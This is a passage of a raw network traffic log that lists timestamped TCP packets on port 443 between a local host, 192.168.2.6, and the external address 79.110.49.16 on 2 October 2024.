                                                                                                                                                Oct 2, 2024 06:25:32.268954992 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.268981934 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.269000053 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.277585030 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.277606010 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.277659893 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.277676105 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.277693987 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.277719975 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.287458897 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.287477970 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.287540913 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.287547112 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.287587881 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.287945032 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.287961006 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.287996054 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.288001060 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.288032055 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.288042068 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.288515091 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.288528919 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.288589954 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.288595915 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.288633108 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.288943052 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.288955927 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.289004087 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.289010048 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.289030075 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.289071083 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.289671898 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.289689064 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.289745092 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.289751053 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.289792061 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.290215015 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.290230989 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.290286064 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.290292025 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.290330887 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.355402946 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.355424881 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.355484009 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.355501890 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.355550051 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.364036083 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.364061117 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.364121914 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.364135981 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.364180088 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.373606920 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.373636007 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.373688936 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.373703957 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.373729944 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.373745918 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.374176025 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.374192953 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.374258995 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.374264956 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.374381065 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.374732971 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.374747992 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.374820948 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.374825954 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.374875069 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.375334024 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.375349045 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.375417948 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.375425100 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.375467062 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.375588894 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.375605106 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.375664949 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.375669956 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.375709057 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.376372099 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.376386881 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.376446962 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.376452923 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.376492023 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.441772938 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.441797018 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.441868067 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.441890001 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.441975117 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.450393915 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.450411081 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.450439930 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.450493097 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.450500011 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.450572968 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.460041046 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.460057020 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.460117102 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.460130930 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.460172892 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.460515976 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.460531950 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.460583925 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.460588932 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.460846901 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.461178064 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.461193085 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.461263895 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.461270094 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.461307049 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.461637974 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.461658955 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.461714029 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.461719036 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.461757898 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.462426901 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.462443113 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.462491989 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.462496996 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.462536097 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.462897062 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.462913036 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.462951899 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.462956905 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.462979078 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.462996006 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.530276060 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.530292034 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.530365944 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.530390024 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.530472994 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.536734104 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.536748886 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.536808014 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.536819935 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.536858082 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.546355009 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.546370983 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.546437979 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.546451092 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.546490908 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.547007084 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.547025919 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.547238111 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.547247887 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.547293901 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.547553062 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.547568083 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.547626019 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.547631979 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.547672033 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.548049927 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.548065901 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.548121929 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.548127890 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.548167944 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.548345089 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.548358917 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.548415899 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.548422098 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.548459053 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.549093008 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.549112082 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.549169064 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.549177885 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.549217939 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.616847038 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.616863966 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.616945028 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.616966009 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.617003918 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.623152971 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.623167992 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.623238087 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.623244047 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.623280048 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.632819891 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.632841110 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.632900000 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.632906914 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.632949114 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.633357048 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.633372068 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.633428097 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.633433104 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.633472919 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.633888006 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.633903027 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.633961916 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.633966923 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.634002924 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.634516954 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.634531975 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.634583950 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.634588003 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.634624004 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.635143995 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.635160923 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.635224104 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.635227919 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.635263920 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.635508060 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.635523081 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.635572910 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.635580063 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.635603905 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.635621071 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.703197956 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.703221083 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.703327894 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.703349113 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.703402996 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.709839106 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.709866047 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.709950924 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.709973097 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.710016966 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.719212055 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.719227076 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.719289064 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.719295979 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.719335079 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.719816923 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.719831944 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.719892025 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.719897985 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.719938993 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.720236063 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.720249891 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.720310926 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.720315933 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.720357895 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.721399069 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.721415043 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.721473932 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.721481085 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.721524000 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.721987009 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.722011089 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.722057104 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.722063065 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.722098112 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.722109079 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.722553968 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.722570896 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.722623110 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.722629070 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.722642899 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.724247932 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.789767027 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.789789915 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.789845943 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.789863110 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.789879084 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.789908886 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.796149015 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.796164989 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.796220064 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.796231031 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.796247959 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.796448946 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.805558920 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.805576086 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.805639029 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.805648088 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.805677891 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.805691957 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.806099892 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.806116104 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.806174040 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.806183100 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.806222916 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.806623936 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.806643963 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.806690931 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.806695938 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.806726933 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.806739092 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.807750940 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.807769060 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.807812929 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.807817936 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.807852983 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.807871103 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.808286905 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.808304071 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.808360100 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.808365107 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.808404922 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.808845043 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.808866024 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.808917046 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.808922052 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.808947086 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.808959007 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.876106977 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.876137972 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.876257896 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.876269102 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.876318932 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.882492065 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.882517099 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.882580996 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.882590055 CEST4434973679.110.49.16192.168.2.6
